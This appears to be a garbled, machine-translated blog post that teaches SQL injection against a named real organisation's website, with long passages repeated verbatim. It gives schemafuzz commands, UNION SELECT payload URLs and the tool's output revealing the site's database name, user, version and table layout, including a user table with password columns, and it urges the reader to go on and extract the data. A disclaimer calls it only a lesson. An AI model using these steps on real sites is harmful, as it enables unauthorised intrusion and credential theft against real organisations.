Get Your Freedom
on this night, in accompany with a cigarette, I'll give you a little about what I do on this night, ie SQL injection by using artificial schemafuzz my own, which I edited from Dorc0de, before I thank predecessors has left us so much knowledge to the successor anda.semoga genenrasi we can continue your struggle to get the right information and also the science of cyberspace, for scrip schemafuzz I have provided in the sheet please download the download itself, the file name schemafuzz
1.find a target
Misal: http://www.ditplb.or.id/profile.php?id=1
2.Enter the command to find colom
on this night, in accompany with a cigarette, I'll give you a little about what I do on this night, ie SQL injection by using artificial schemafuzz my own, which I edited from Dorc0de, before I thank predecessors has left us so much knowledge to the successor anda.semoga genenrasi we can continue your struggle to get the right information and also the science of cyberspace, for scrip schemafuzz I have provided in the sheet please download the download itself, the file name schemafuzz
1.find a target
Misal: http://www.ditplb.or.id/profile.php?id=1
2.Enter the command to find colom
ex: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcoland this is what we can:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"
[+] 20:36:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--
[+] gen0l
URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l
[-] Done!
Means we use
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l
for inject
3.find a database with command --dbs
Ex : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l";
--dbs
and this is what we can:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l--
[+] Evasion Used: "+" "--"
[+] 20:39:32
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
visible to us it is the database name : t15618_plb
4.find a table in the database
example: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D t15618_plb
and this is what we can:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 20:43:10
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done
and now you continue to live longer by finding the contents of that file.
There is easy bukan.untuk further can contact me at YM.
This is only for the lessons and there is no intention to commit a crime
Related Articles :
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"
[+] 20:36:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,
[+] Column Length is: 3
[+] Found null column at column #: 2
[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--
[+] gen0l
URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l
[-] Done!
Means we use
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l
for inject
3.find a database with command --dbs
Ex : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l";
--dbs
and this is what we can:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,gen0l--
[+] Evasion Used: "+" "--"
[+] 20:39:32
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t15618_plb
visible to us it is the database name : t15618_plb
4.find a table in the database
example: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D t15618_plb
and this is what we can:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--
[+] Evasion Used: "+" "--"
[+] 20:43:10
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t15618_plb
User: t15618_pl...@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done
and now you continue to live longer by finding the contents of that file.
There is easy bukan.untuk further can contact me at YM.
This is only for the lessons and there is no intention to commit a crime
0 komentar:
Posting Komentar